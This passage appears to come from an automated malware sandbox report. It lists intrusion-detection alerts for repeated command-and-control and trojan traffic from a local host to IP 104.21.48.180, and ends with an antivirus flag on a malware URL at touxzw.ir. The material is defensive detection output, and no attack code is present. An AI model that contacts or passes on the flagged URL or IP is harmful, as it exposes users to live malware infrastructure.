            2025-02-20T16:17:56.170636+010020243181Malware Command and Control Activity Detected192.168.2.550078104.21.48.180TCP
            2025-02-20T16:17:56.990527+010020243181Malware Command and Control Activity Detected192.168.2.550079104.21.48.180TCP
            2025-02-20T16:17:57.950763+010020243181Malware Command and Control Activity Detected192.168.2.550080104.21.48.180TCP
            2025-02-20T16:17:58.792069+010020243181Malware Command and Control Activity Detected192.168.2.550081104.21.48.180TCP
            2025-02-20T16:17:59.769874+010020243181Malware Command and Control Activity Detected192.168.2.550082104.21.48.180TCP
            2025-02-20T16:18:00.585095+010020243181Malware Command and Control Activity Detected192.168.2.550083104.21.48.180TCP
            2025-02-20T16:18:01.673948+010020243181Malware Command and Control Activity Detected192.168.2.550084104.21.48.180TCP
            2025-02-20T16:18:02.527456+010020243181Malware Command and Control Activity Detected192.168.2.550085104.21.48.180TCP
            2025-02-20T16:18:03.377232+010020243181Malware Command and Control Activity Detected192.168.2.550086104.21.48.180TCP
            2025-02-20T16:18:04.336245+010020243181Malware Command and Control Activity Detected192.168.2.550087104.21.48.180TCP
            2025-02-20T16:18:05.259144+010020243181Malware Command and Control Activity Detected192.168.2.550088104.21.48.180TCP
            2025-02-20T16:18:06.257394+010020243181Malware Command and Control Activity Detected192.168.2.550089104.21.48.180TCP
            2025-02-20T16:18:07.223528+010020243181Malware Command and Control Activity Detected192.168.2.550090104.21.48.180TCP
            2025-02-20T16:18:08.171789+010020243181Malware Command and Control Activity Detected192.168.2.550091104.21.48.180TCP
            2025-02-20T16:18:09.097978+010020243181Malware Command and Control Activity Detected192.168.2.550092104.21.48.180TCP
            2025-02-20T16:18:09.928723+010020243181Malware Command and Control Activity Detected192.168.2.550093104.21.48.180TCP
            2025-02-20T16:18:10.738427+010020243181Malware Command and Control Activity Detected192.168.2.550094104.21.48.180TCP
            2025-02-20T16:18:11.810822+010020243181Malware Command and Control Activity Detected192.168.2.550095104.21.48.180TCP
            2025-02-20T16:18:12.613983+010020243181Malware Command and Control Activity Detected192.168.2.550096104.21.48.180TCP
            2025-02-20T16:18:13.515960+010020243181Malware Command and Control Activity Detected192.168.2.550097104.21.48.180TCP
            2025-02-20T16:18:14.433231+010020243181Malware Command and Control Activity Detected192.168.2.550098104.21.48.180TCP
            2025-02-20T16:18:15.267674+010020243181Malware Command and Control Activity Detected192.168.2.550099104.21.48.180TCP
            2025-02-20T16:18:16.204766+010020243181Malware Command and Control Activity Detected192.168.2.550100104.21.48.180TCP
            2025-02-20T16:18:17.154296+010020243181Malware Command and Control Activity Detected192.168.2.550101104.21.48.180TCP
            2025-02-20T16:18:18.095583+010020243181Malware Command and Control Activity Detected192.168.2.550102104.21.48.180TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-02-20T16:16:16.322309+010020216411A Network Trojan was detected192.168.2.549704104.21.48.180TCP
            2025-02-20T16:16:17.307331+010020216411A Network Trojan was detected192.168.2.549705104.21.48.180TCP
            2025-02-20T16:16:18.367474+010020216411A Network Trojan was detected192.168.2.549706104.21.48.180TCP
            2025-02-20T16:16:19.335336+010020216411A Network Trojan was detected192.168.2.549707104.21.48.180TCP
            2025-02-20T16:16:20.324351+010020216411A Network Trojan was detected192.168.2.549708104.21.48.180TCP
            2025-02-20T16:16:21.323819+010020216411A Network Trojan was detected192.168.2.549709104.21.48.180TCP
            2025-02-20T16:16:22.294705+010020216411A Network Trojan was detected192.168.2.549710104.21.48.180TCP
            2025-02-20T16:16:23.200838+010020216411A Network Trojan was detected192.168.2.549711104.21.48.180TCP
            2025-02-20T16:16:24.125311+010020216411A Network Trojan was detected192.168.2.549712104.21.48.180TCP
            2025-02-20T16:16:25.039521+010020216411A Network Trojan was detected192.168.2.549713104.21.48.180TCP
            2025-02-20T16:16:25.981651+010020216411A Network Trojan was detected192.168.2.549714104.21.48.180TCP
            2025-02-20T16:16:26.969517+010020216411A Network Trojan was detected192.168.2.549715104.21.48.180TCP
            2025-02-20T16:16:28.022554+010020216411A Network Trojan was detected192.168.2.549716104.21.48.180TCP
            2025-02-20T16:16:28.967798+010020216411A Network Trojan was detected192.168.2.549717104.21.48.180TCP
            2025-02-20T16:16:29.956089+010020216411A Network Trojan was detected192.168.2.549720104.21.48.180TCP
            2025-02-20T16:16:30.900670+010020216411A Network Trojan was detected192.168.2.549722104.21.48.180TCP
            2025-02-20T16:16:31.873987+010020216411A Network Trojan was detected192.168.2.549733104.21.48.180TCP
            2025-02-20T16:16:32.797871+010020216411A Network Trojan was detected192.168.2.549741104.21.48.180TCP
            2025-02-20T16:16:33.758158+010020216411A Network Trojan was detected192.168.2.549747104.21.48.180TCP
            2025-02-20T16:16:34.669656+010020216411A Network Trojan was detected192.168.2.549753104.21.48.180TCP
            2025-02-20T16:16:35.612325+010020216411A Network Trojan was detected192.168.2.549759104.21.48.180TCP
            2025-02-20T16:16:36.551922+010020216411A Network Trojan was detected192.168.2.549764104.21.48.180TCP
            2025-02-20T16:16:37.492477+010020216411A Network Trojan was detected192.168.2.549771104.21.48.180TCP
            2025-02-20T16:16:38.389144+010020216411A Network Trojan was detected192.168.2.549777104.21.48.180TCP
            2025-02-20T16:16:39.334739+010020216411A Network Trojan was detected192.168.2.549784104.21.48.180TCP
            2025-02-20T16:16:40.131753+010020216411A Network Trojan was detected192.168.2.549790104.21.48.180TCP
            2025-02-20T16:16:40.896407+010020216411A Network Trojan was detected192.168.2.549796104.21.48.180TCP
            2025-02-20T16:16:41.796338+010020216411A Network Trojan was detected192.168.2.549802104.21.48.180TCP
            2025-02-20T16:16:42.604162+010020216411A Network Trojan was detected192.168.2.549808104.21.48.180TCP
            2025-02-20T16:16:43.498058+010020216411A Network Trojan was detected192.168.2.549816104.21.48.180TCP
            2025-02-20T16:16:44.335802+010020216411A Network Trojan was detected192.168.2.549823104.21.48.180TCP
            2025-02-20T16:16:45.259021+010020216411A Network Trojan was detected192.168.2.549829104.21.48.180TCP
            2025-02-20T16:16:46.052711+010020216411A Network Trojan was detected192.168.2.549835104.21.48.180TCP
            2025-02-20T16:16:47.026184+010020216411A Network Trojan was detected192.168.2.549840104.21.48.180TCP
            2025-02-20T16:16:48.037442+010020216411A Network Trojan was detected192.168.2.549848104.21.48.180TCP
            2025-02-20T16:16:48.973042+010020216411A Network Trojan was detected192.168.2.549856104.21.48.180TCP
            2025-02-20T16:16:50.051457+010020216411A Network Trojan was detected192.168.2.549863104.21.48.180TCP
            2025-02-20T16:16:51.000609+010020216411A Network Trojan was detected192.168.2.549869104.21.48.180TCP
            2025-02-20T16:16:51.758357+010020216411A Network Trojan was detected192.168.2.549875104.21.48.180TCP
            2025-02-20T16:16:52.697953+010020216411A Network Trojan was detected192.168.2.549884104.21.48.180TCP
            2025-02-20T16:16:54.583144+010020216411A Network Trojan was detected192.168.2.549896104.21.48.180TCP
            2025-02-20T16:16:55.459859+010020216411A Network Trojan was detected192.168.2.549902104.21.48.180TCP
            2025-02-20T16:16:56.396860+010020216411A Network Trojan was detected192.168.2.549909104.21.48.180TCP
            2025-02-20T16:16:57.602808+010020216411A Network Trojan was detected192.168.2.549919104.21.48.180TCP
            2025-02-20T16:16:58.568401+010020216411A Network Trojan was detected192.168.2.549925104.21.48.180TCP
            2025-02-20T16:16:59.383755+010020216411A Network Trojan was detected192.168.2.549932104.21.48.180TCP
            2025-02-20T16:17:00.583736+010020216411A Network Trojan was detected192.168.2.549940104.21.48.180TCP
            2025-02-20T16:17:01.521989+010020216411A Network Trojan was detected192.168.2.549948104.21.48.180TCP
            2025-02-20T16:17:02.747718+010020216411A Network Trojan was detected192.168.2.549956104.21.48.180TCP
            2025-02-20T16:17:03.579100+010020216411A Network Trojan was detected192.168.2.549962104.21.48.180TCP
            2025-02-20T16:17:04.418454+010020216411A Network Trojan was detected192.168.2.549969104.21.48.180TCP
            2025-02-20T16:17:05.383888+010020216411A Network Trojan was detected192.168.2.549975104.21.48.180TCP
            2025-02-20T16:17:06.341337+010020216411A Network Trojan was detected192.168.2.549983104.21.48.180TCP
            2025-02-20T16:17:07.257546+010020216411A Network Trojan was detected192.168.2.549990104.21.48.180TCP
            2025-02-20T16:17:08.254281+010020216411A Network Trojan was detected192.168.2.549998104.21.48.180TCP
            2025-02-20T16:17:09.180238+010020216411A Network Trojan was detected192.168.2.550005104.21.48.180TCP
            2025-02-20T16:17:10.142553+010020216411A Network Trojan was detected192.168.2.550011104.21.48.180TCP
            2025-02-20T16:17:11.133529+010020216411A Network Trojan was detected192.168.2.550020104.21.48.180TCP
            2025-02-20T16:17:11.941724+010020216411A Network Trojan was detected192.168.2.550025104.21.48.180TCP
            2025-02-20T16:17:12.894688+010020216411A Network Trojan was detected192.168.2.550032104.21.48.180TCP
            2025-02-20T16:17:13.851657+010020216411A Network Trojan was detected192.168.2.550034104.21.48.180TCP
            2025-02-20T16:17:15.074419+010020216411A Network Trojan was detected192.168.2.550035104.21.48.180TCP
            2025-02-20T16:17:16.073887+010020216411A Network Trojan was detected192.168.2.550036104.21.48.180TCP
            2025-02-20T16:17:17.024522+010020216411A Network Trojan was detected192.168.2.550037104.21.48.180TCP
            2025-02-20T16:17:17.857847+010020216411A Network Trojan was detected192.168.2.550038104.21.48.180TCP
            2025-02-20T16:17:18.678223+010020216411A Network Trojan was detected192.168.2.550039104.21.48.180TCP
            2025-02-20T16:17:19.518205+010020216411A Network Trojan was detected192.168.2.550040104.21.48.180TCP
            2025-02-20T16:17:20.726809+010020216411A Network Trojan was detected192.168.2.550041104.21.48.180TCP
            2025-02-20T16:17:21.644405+010020216411A Network Trojan was detected192.168.2.550042104.21.48.180TCP
            2025-02-20T16:17:22.592381+010020216411A Network Trojan was detected192.168.2.550043104.21.48.180TCP
            2025-02-20T16:17:23.539726+010020216411A Network Trojan was detected192.168.2.550044104.21.48.180TCP
            2025-02-20T16:17:24.357576+010020216411A Network Trojan was detected192.168.2.550045104.21.48.180TCP
            2025-02-20T16:17:25.195454+010020216411A Network Trojan was detected192.168.2.550046104.21.48.180TCP
            2025-02-20T16:17:26.144422+010020216411A Network Trojan was detected192.168.2.550047104.21.48.180TCP
            2025-02-20T16:17:27.126923+010020216411A Network Trojan was detected192.168.2.550048104.21.48.180TCP
            2025-02-20T16:17:28.177373+010020216411A Network Trojan was detected192.168.2.550049104.21.48.180TCP
            2025-02-20T16:17:29.043382+010020216411A Network Trojan was detected192.168.2.550050104.21.48.180TCP
            2025-02-20T16:17:30.032338+010020216411A Network Trojan was detected192.168.2.550051104.21.48.180TCP
            2025-02-20T16:17:30.923035+010020216411A Network Trojan was detected192.168.2.550052104.21.48.180TCP
            2025-02-20T16:17:32.024601+010020216411A Network Trojan was detected192.168.2.550053104.21.48.180TCP
            2025-02-20T16:17:32.950587+010020216411A Network Trojan was detected192.168.2.550054104.21.48.180TCP
            2025-02-20T16:17:33.944204+010020216411A Network Trojan was detected192.168.2.550055104.21.48.180TCP
            2025-02-20T16:17:34.925143+010020216411A Network Trojan was detected192.168.2.550056104.21.48.180TCP
            2025-02-20T16:17:35.739092+010020216411A Network Trojan was detected192.168.2.550057104.21.48.180TCP
            2025-02-20T16:17:36.711985+010020216411A Network Trojan was detected192.168.2.550058104.21.48.180TCP
            2025-02-20T16:17:37.679673+010020216411A Network Trojan was detected192.168.2.550059104.21.48.180TCP
            2025-02-20T16:17:38.635771+010020216411A Network Trojan was detected192.168.2.550060104.21.48.180TCP
            2025-02-20T16:17:39.646426+010020216411A Network Trojan was detected192.168.2.550061104.21.48.180TCP
            2025-02-20T16:17:40.622099+010020216411A Network Trojan was detected192.168.2.550062104.21.48.180TCP
            2025-02-20T16:17:41.551088+010020216411A Network Trojan was detected192.168.2.550063104.21.48.180TCP
            2025-02-20T16:17:42.520135+010020216411A Network Trojan was detected192.168.2.550064104.21.48.180TCP
            2025-02-20T16:17:43.453546+010020216411A Network Trojan was detected192.168.2.550065104.21.48.180TCP
            2025-02-20T16:17:44.274483+010020216411A Network Trojan was detected192.168.2.550066104.21.48.180TCP
            2025-02-20T16:17:45.242709+010020216411A Network Trojan was detected192.168.2.550067104.21.48.180TCP
            2025-02-20T16:17:46.147396+010020216411A Network Trojan was detected192.168.2.550068104.21.48.180TCP
            2025-02-20T16:17:47.121340+010020216411A Network Trojan was detected192.168.2.550069104.21.48.180TCP
            2025-02-20T16:17:47.916673+010020216411A Network Trojan was detected192.168.2.550070104.21.48.180TCP
            2025-02-20T16:17:48.898986+010020216411A Network Trojan was detected192.168.2.550071104.21.48.180TCP
            2025-02-20T16:17:49.825519+010020216411A Network Trojan was detected192.168.2.550072104.21.48.180TCP
            2025-02-20T16:17:50.794615+010020216411A Network Trojan was detected192.168.2.550073104.21.48.180TCP
            2025-02-20T16:17:51.615187+010020216411A Network Trojan was detected192.168.2.550074104.21.48.180TCP
            2025-02-20T16:17:52.600140+010020216411A Network Trojan was detected192.168.2.550075104.21.48.180TCP
            2025-02-20T16:17:53.569529+010020216411A Network Trojan was detected192.168.2.550076104.21.48.180TCP
            2025-02-20T16:17:54.551208+010020216411A Network Trojan was detected192.168.2.550077104.21.48.180TCP
            2025-02-20T16:17:55.378087+010020216411A Network Trojan was detected192.168.2.550078104.21.48.180TCP
            2025-02-20T16:17:56.343098+010020216411A Network Trojan was detected192.168.2.550079104.21.48.180TCP
            2025-02-20T16:17:57.170825+010020216411A Network Trojan was detected192.168.2.550080104.21.48.180TCP
            2025-02-20T16:17:58.135758+010020216411A Network Trojan was detected192.168.2.550081104.21.48.180TCP
            2025-02-20T16:17:58.954650+010020216411A Network Trojan was detected192.168.2.550082104.21.48.180TCP
            2025-02-20T16:17:59.930325+010020216411A Network Trojan was detected192.168.2.550083104.21.48.180TCP
            2025-02-20T16:18:00.765832+010020216411A Network Trojan was detected192.168.2.550084104.21.48.180TCP
            2025-02-20T16:18:01.842155+010020216411A Network Trojan was detected192.168.2.550085104.21.48.180TCP
            2025-02-20T16:18:02.698380+010020216411A Network Trojan was detected192.168.2.550086104.21.48.180TCP
            2025-02-20T16:18:03.548403+010020216411A Network Trojan was detected192.168.2.550087104.21.48.180TCP
            2025-02-20T16:18:04.511337+010020216411A Network Trojan was detected192.168.2.550088104.21.48.180TCP
            2025-02-20T16:18:05.453021+010020216411A Network Trojan was detected192.168.2.550089104.21.48.180TCP
            2025-02-20T16:18:06.428189+010020216411A Network Trojan was detected192.168.2.550090104.21.48.180TCP
            2025-02-20T16:18:07.391494+010020216411A Network Trojan was detected192.168.2.550091104.21.48.180TCP
            2025-02-20T16:18:08.341451+010020216411A Network Trojan was detected192.168.2.550092104.21.48.180TCP
            2025-02-20T16:18:09.260283+010020216411A Network Trojan was detected192.168.2.550093104.21.48.180TCP
            2025-02-20T16:18:10.110310+010020216411A Network Trojan was detected192.168.2.550094104.21.48.180TCP
            2025-02-20T16:18:10.982207+010020216411A Network Trojan was detected192.168.2.550095104.21.48.180TCP
            2025-02-20T16:18:11.978903+010020216411A Network Trojan was detected192.168.2.550096104.21.48.180TCP
            2025-02-20T16:18:12.775197+010020216411A Network Trojan was detected192.168.2.550097104.21.48.180TCP
            2025-02-20T16:18:13.673870+010020216411A Network Trojan was detected192.168.2.550098104.21.48.180TCP
            2025-02-20T16:18:14.614710+010020216411A Network Trojan was detected192.168.2.550099104.21.48.180TCP
            2025-02-20T16:18:15.418259+010020216411A Network Trojan was detected192.168.2.550100104.21.48.180TCP
            2025-02-20T16:18:16.362183+010020216411A Network Trojan was detected192.168.2.550101104.21.48.180TCP
            2025-02-20T16:18:17.340457+010020216411A Network Trojan was detected192.168.2.550102104.21.48.180TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-02-20T16:16:16.322309+010028257661Malware Command and Control Activity Detected192.168.2.549704104.21.48.180TCP
            2025-02-20T16:16:17.307331+010028257661Malware Command and Control Activity Detected192.168.2.549705104.21.48.180TCP
            2025-02-20T16:16:18.367474+010028257661Malware Command and Control Activity Detected192.168.2.549706104.21.48.180TCP
            2025-02-20T16:16:19.335336+010028257661Malware Command and Control Activity Detected192.168.2.549707104.21.48.180TCP
            2025-02-20T16:16:20.324351+010028257661Malware Command and Control Activity Detected192.168.2.549708104.21.48.180TCP
            2025-02-20T16:16:21.323819+010028257661Malware Command and Control Activity Detected192.168.2.549709104.21.48.180TCP
            2025-02-20T16:16:22.294705+010028257661Malware Command and Control Activity Detected192.168.2.549710104.21.48.180TCP
            2025-02-20T16:16:23.200838+010028257661Malware Command and Control Activity Detected192.168.2.549711104.21.48.180TCP
            2025-02-20T16:16:24.125311+010028257661Malware Command and Control Activity Detected192.168.2.549712104.21.48.180TCP
            2025-02-20T16:16:25.039521+010028257661Malware Command and Control Activity Detected192.168.2.549713104.21.48.180TCP
            2025-02-20T16:16:25.981651+010028257661Malware Command and Control Activity Detected192.168.2.549714104.21.48.180TCP
            2025-02-20T16:16:26.969517+010028257661Malware Command and Control Activity Detected192.168.2.549715104.21.48.180TCP
            2025-02-20T16:16:28.022554+010028257661Malware Command and Control Activity Detected192.168.2.549716104.21.48.180TCP
            2025-02-20T16:16:28.967798+010028257661Malware Command and Control Activity Detected192.168.2.549717104.21.48.180TCP
            2025-02-20T16:16:29.956089+010028257661Malware Command and Control Activity Detected192.168.2.549720104.21.48.180TCP
            2025-02-20T16:16:30.900670+010028257661Malware Command and Control Activity Detected192.168.2.549722104.21.48.180TCP
            2025-02-20T16:16:31.873987+010028257661Malware Command and Control Activity Detected192.168.2.549733104.21.48.180TCP
            2025-02-20T16:16:32.797871+010028257661Malware Command and Control Activity Detected192.168.2.549741104.21.48.180TCP
            2025-02-20T16:16:33.758158+010028257661Malware Command and Control Activity Detected192.168.2.549747104.21.48.180TCP
            2025-02-20T16:16:34.669656+010028257661Malware Command and Control Activity Detected192.168.2.549753104.21.48.180TCP
            2025-02-20T16:16:35.612325+010028257661Malware Command and Control Activity Detected192.168.2.549759104.21.48.180TCP
            2025-02-20T16:16:36.551922+010028257661Malware Command and Control Activity Detected192.168.2.549764104.21.48.180TCP
            2025-02-20T16:16:37.492477+010028257661Malware Command and Control Activity Detected192.168.2.549771104.21.48.180TCP
            2025-02-20T16:16:38.389144+010028257661Malware Command and Control Activity Detected192.168.2.549777104.21.48.180TCP
            2025-02-20T16:16:39.334739+010028257661Malware Command and Control Activity Detected192.168.2.549784104.21.48.180TCP
            2025-02-20T16:16:40.131753+010028257661Malware Command and Control Activity Detected192.168.2.549790104.21.48.180TCP
            2025-02-20T16:16:40.896407+010028257661Malware Command and Control Activity Detected192.168.2.549796104.21.48.180TCP
            2025-02-20T16:16:41.796338+010028257661Malware Command and Control Activity Detected192.168.2.549802104.21.48.180TCP
            2025-02-20T16:16:42.604162+010028257661Malware Command and Control Activity Detected192.168.2.549808104.21.48.180TCP
            2025-02-20T16:16:43.498058+010028257661Malware Command and Control Activity Detected192.168.2.549816104.21.48.180TCP
            2025-02-20T16:16:44.335802+010028257661Malware Command and Control Activity Detected192.168.2.549823104.21.48.180TCP
            2025-02-20T16:16:45.259021+010028257661Malware Command and Control Activity Detected192.168.2.549829104.21.48.180TCP
            2025-02-20T16:16:46.052711+010028257661Malware Command and Control Activity Detected192.168.2.549835104.21.48.180TCP
            2025-02-20T16:16:47.026184+010028257661Malware Command and Control Activity Detected192.168.2.549840104.21.48.180TCP
            2025-02-20T16:16:48.037442+010028257661Malware Command and Control Activity Detected192.168.2.549848104.21.48.180TCP
            2025-02-20T16:16:48.973042+010028257661Malware Command and Control Activity Detected192.168.2.549856104.21.48.180TCP
            2025-02-20T16:16:50.051457+010028257661Malware Command and Control Activity Detected192.168.2.549863104.21.48.180TCP
            2025-02-20T16:16:51.000609+010028257661Malware Command and Control Activity Detected192.168.2.549869104.21.48.180TCP
            2025-02-20T16:16:51.758357+010028257661Malware Command and Control Activity Detected192.168.2.549875104.21.48.180TCP
            2025-02-20T16:16:52.697953+010028257661Malware Command and Control Activity Detected192.168.2.549884104.21.48.180TCP
            2025-02-20T16:16:54.583144+010028257661Malware Command and Control Activity Detected192.168.2.549896104.21.48.180TCP
            2025-02-20T16:16:55.459859+010028257661Malware Command and Control Activity Detected192.168.2.549902104.21.48.180TCP
            2025-02-20T16:16:56.396860+010028257661Malware Command and Control Activity Detected192.168.2.549909104.21.48.180TCP
            2025-02-20T16:16:57.602808+010028257661Malware Command and Control Activity Detected192.168.2.549919104.21.48.180TCP
            2025-02-20T16:16:58.568401+010028257661Malware Command and Control Activity Detected192.168.2.549925104.21.48.180TCP
            2025-02-20T16:16:59.383755+010028257661Malware Command and Control Activity Detected192.168.2.549932104.21.48.180TCP
            2025-02-20T16:17:00.583736+010028257661Malware Command and Control Activity Detected192.168.2.549940104.21.48.180TCP
            2025-02-20T16:17:01.521989+010028257661Malware Command and Control Activity Detected192.168.2.549948104.21.48.180TCP
            2025-02-20T16:17:02.747718+010028257661Malware Command and Control Activity Detected192.168.2.549956104.21.48.180TCP
            2025-02-20T16:17:03.579100+010028257661Malware Command and Control Activity Detected192.168.2.549962104.21.48.180TCP
            2025-02-20T16:17:04.418454+010028257661Malware Command and Control Activity Detected192.168.2.549969104.21.48.180TCP
            2025-02-20T16:17:05.383888+010028257661Malware Command and Control Activity Detected192.168.2.549975104.21.48.180TCP
            2025-02-20T16:17:06.341337+010028257661Malware Command and Control Activity Detected192.168.2.549983104.21.48.180TCP
            2025-02-20T16:17:07.257546+010028257661Malware Command and Control Activity Detected192.168.2.549990104.21.48.180TCP
            2025-02-20T16:17:08.254281+010028257661Malware Command and Control Activity Detected192.168.2.549998104.21.48.180TCP
            2025-02-20T16:17:09.180238+010028257661Malware Command and Control Activity Detected192.168.2.550005104.21.48.180TCP
            2025-02-20T16:17:10.142553+010028257661Malware Command and Control Activity Detected192.168.2.550011104.21.48.180TCP
            2025-02-20T16:17:11.133529+010028257661Malware Command and Control Activity Detected192.168.2.550020104.21.48.180TCP
            2025-02-20T16:17:11.941724+010028257661Malware Command and Control Activity Detected192.168.2.550025104.21.48.180TCP
            2025-02-20T16:17:12.894688+010028257661Malware Command and Control Activity Detected192.168.2.550032104.21.48.180TCP
            2025-02-20T16:17:13.851657+010028257661Malware Command and Control Activity Detected192.168.2.550034104.21.48.180TCP
            2025-02-20T16:17:15.074419+010028257661Malware Command and Control Activity Detected192.168.2.550035104.21.48.180TCP
            2025-02-20T16:17:16.073887+010028257661Malware Command and Control Activity Detected192.168.2.550036104.21.48.180TCP
            2025-02-20T16:17:17.024522+010028257661Malware Command and Control Activity Detected192.168.2.550037104.21.48.180TCP
            2025-02-20T16:17:17.857847+010028257661Malware Command and Control Activity Detected192.168.2.550038104.21.48.180TCP
            2025-02-20T16:17:18.678223+010028257661Malware Command and Control Activity Detected192.168.2.550039104.21.48.180TCP
            2025-02-20T16:17:19.518205+010028257661Malware Command and Control Activity Detected192.168.2.550040104.21.48.180TCP
            2025-02-20T16:17:20.726809+010028257661Malware Command and Control Activity Detected192.168.2.550041104.21.48.180TCP
            2025-02-20T16:17:21.644405+010028257661Malware Command and Control Activity Detected192.168.2.550042104.21.48.180TCP
            2025-02-20T16:17:22.592381+010028257661Malware Command and Control Activity Detected192.168.2.550043104.21.48.180TCP
            2025-02-20T16:17:23.539726+010028257661Malware Command and Control Activity Detected192.168.2.550044104.21.48.180TCP
            2025-02-20T16:17:24.357576+010028257661Malware Command and Control Activity Detected192.168.2.550045104.21.48.180TCP
            2025-02-20T16:17:25.195454+010028257661Malware Command and Control Activity Detected192.168.2.550046104.21.48.180TCP
            2025-02-20T16:17:26.144422+010028257661Malware Command and Control Activity Detected192.168.2.550047104.21.48.180TCP
            2025-02-20T16:17:27.126923+010028257661Malware Command and Control Activity Detected192.168.2.550048104.21.48.180TCP
            2025-02-20T16:17:28.177373+010028257661Malware Command and Control Activity Detected192.168.2.550049104.21.48.180TCP
            2025-02-20T16:17:29.043382+010028257661Malware Command and Control Activity Detected192.168.2.550050104.21.48.180TCP
            2025-02-20T16:17:30.032338+010028257661Malware Command and Control Activity Detected192.168.2.550051104.21.48.180TCP
            2025-02-20T16:17:30.923035+010028257661Malware Command and Control Activity Detected192.168.2.550052104.21.48.180TCP
            2025-02-20T16:17:32.024601+010028257661Malware Command and Control Activity Detected192.168.2.550053104.21.48.180TCP
            2025-02-20T16:17:32.950587+010028257661Malware Command and Control Activity Detected192.168.2.550054104.21.48.180TCP
            2025-02-20T16:17:33.944204+010028257661Malware Command and Control Activity Detected192.168.2.550055104.21.48.180TCP
            2025-02-20T16:17:34.925143+010028257661Malware Command and Control Activity Detected192.168.2.550056104.21.48.180TCP
            2025-02-20T16:17:35.739092+010028257661Malware Command and Control Activity Detected192.168.2.550057104.21.48.180TCP
            2025-02-20T16:17:36.711985+010028257661Malware Command and Control Activity Detected192.168.2.550058104.21.48.180TCP
            2025-02-20T16:17:37.679673+010028257661Malware Command and Control Activity Detected192.168.2.550059104.21.48.180TCP
            2025-02-20T16:17:38.635771+010028257661Malware Command and Control Activity Detected192.168.2.550060104.21.48.180TCP
            2025-02-20T16:17:39.646426+010028257661Malware Command and Control Activity Detected192.168.2.550061104.21.48.180TCP
            2025-02-20T16:17:40.622099+010028257661Malware Command and Control Activity Detected192.168.2.550062104.21.48.180TCP
            2025-02-20T16:17:41.551088+010028257661Malware Command and Control Activity Detected192.168.2.550063104.21.48.180TCP
            2025-02-20T16:17:42.520135+010028257661Malware Command and Control Activity Detected192.168.2.550064104.21.48.180TCP
            2025-02-20T16:17:43.453546+010028257661Malware Command and Control Activity Detected192.168.2.550065104.21.48.180TCP
            2025-02-20T16:17:44.274483+010028257661Malware Command and Control Activity Detected192.168.2.550066104.21.48.180TCP
            2025-02-20T16:17:45.242709+010028257661Malware Command and Control Activity Detected192.168.2.550067104.21.48.180TCP
            2025-02-20T16:17:46.147396+010028257661Malware Command and Control Activity Detected192.168.2.550068104.21.48.180TCP
            2025-02-20T16:17:47.121340+010028257661Malware Command and Control Activity Detected192.168.2.550069104.21.48.180TCP
            2025-02-20T16:17:47.916673+010028257661Malware Command and Control Activity Detected192.168.2.550070104.21.48.180TCP
            2025-02-20T16:17:48.898986+010028257661Malware Command and Control Activity Detected192.168.2.550071104.21.48.180TCP
            2025-02-20T16:17:49.825519+010028257661Malware Command and Control Activity Detected192.168.2.550072104.21.48.180TCP
            2025-02-20T16:17:50.794615+010028257661Malware Command and Control Activity Detected192.168.2.550073104.21.48.180TCP
            2025-02-20T16:17:51.615187+010028257661Malware Command and Control Activity Detected192.168.2.550074104.21.48.180TCP
            2025-02-20T16:17:52.600140+010028257661Malware Command and Control Activity Detected192.168.2.550075104.21.48.180TCP
            2025-02-20T16:17:53.569529+010028257661Malware Command and Control Activity Detected192.168.2.550076104.21.48.180TCP
            2025-02-20T16:17:54.551208+010028257661Malware Command and Control Activity Detected192.168.2.550077104.21.48.180TCP
            2025-02-20T16:17:55.378087+010028257661Malware Command and Control Activity Detected192.168.2.550078104.21.48.180TCP
            2025-02-20T16:17:56.343098+010028257661Malware Command and Control Activity Detected192.168.2.550079104.21.48.180TCP
            2025-02-20T16:17:57.170825+010028257661Malware Command and Control Activity Detected192.168.2.550080104.21.48.180TCP
            2025-02-20T16:17:58.135758+010028257661Malware Command and Control Activity Detected192.168.2.550081104.21.48.180TCP
            2025-02-20T16:17:58.954650+010028257661Malware Command and Control Activity Detected192.168.2.550082104.21.48.180TCP
            2025-02-20T16:17:59.930325+010028257661Malware Command and Control Activity Detected192.168.2.550083104.21.48.180TCP
            2025-02-20T16:18:00.765832+010028257661Malware Command and Control Activity Detected192.168.2.550084104.21.48.180TCP
            2025-02-20T16:18:01.842155+010028257661Malware Command and Control Activity Detected192.168.2.550085104.21.48.180TCP
            2025-02-20T16:18:02.698380+010028257661Malware Command and Control Activity Detected192.168.2.550086104.21.48.180TCP
            2025-02-20T16:18:03.548403+010028257661Malware Command and Control Activity Detected192.168.2.550087104.21.48.180TCP
            2025-02-20T16:18:04.511337+010028257661Malware Command and Control Activity Detected192.168.2.550088104.21.48.180TCP
            2025-02-20T16:18:05.453021+010028257661Malware Command and Control Activity Detected192.168.2.550089104.21.48.180TCP
            2025-02-20T16:18:06.428189+010028257661Malware Command and Control Activity Detected192.168.2.550090104.21.48.180TCP
            2025-02-20T16:18:07.391494+010028257661Malware Command and Control Activity Detected192.168.2.550091104.21.48.180TCP
            2025-02-20T16:18:08.341451+010028257661Malware Command and Control Activity Detected192.168.2.550092104.21.48.180TCP
            2025-02-20T16:18:09.260283+010028257661Malware Command and Control Activity Detected192.168.2.550093104.21.48.180TCP
            2025-02-20T16:18:10.110310+010028257661Malware Command and Control Activity Detected192.168.2.550094104.21.48.180TCP
            2025-02-20T16:18:10.982207+010028257661Malware Command and Control Activity Detected192.168.2.550095104.21.48.180TCP
            2025-02-20T16:18:11.978903+010028257661Malware Command and Control Activity Detected192.168.2.550096104.21.48.180TCP
            2025-02-20T16:18:12.775197+010028257661Malware Command and Control Activity Detected192.168.2.550097104.21.48.180TCP
            2025-02-20T16:18:13.673870+010028257661Malware Command and Control Activity Detected192.168.2.550098104.21.48.180TCP
            2025-02-20T16:18:14.614710+010028257661Malware Command and Control Activity Detected192.168.2.550099104.21.48.180TCP
            2025-02-20T16:18:15.418259+010028257661Malware Command and Control Activity Detected192.168.2.550100104.21.48.180TCP
            2025-02-20T16:18:16.362183+010028257661Malware Command and Control Activity Detected192.168.2.550101104.21.48.180TCP
            2025-02-20T16:18:17.340457+010028257661Malware Command and Control Activity Detected192.168.2.550102104.21.48.180TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: http://touxzw.ir/fix/five/fre.phpAvira URL Cloud: Label: malware
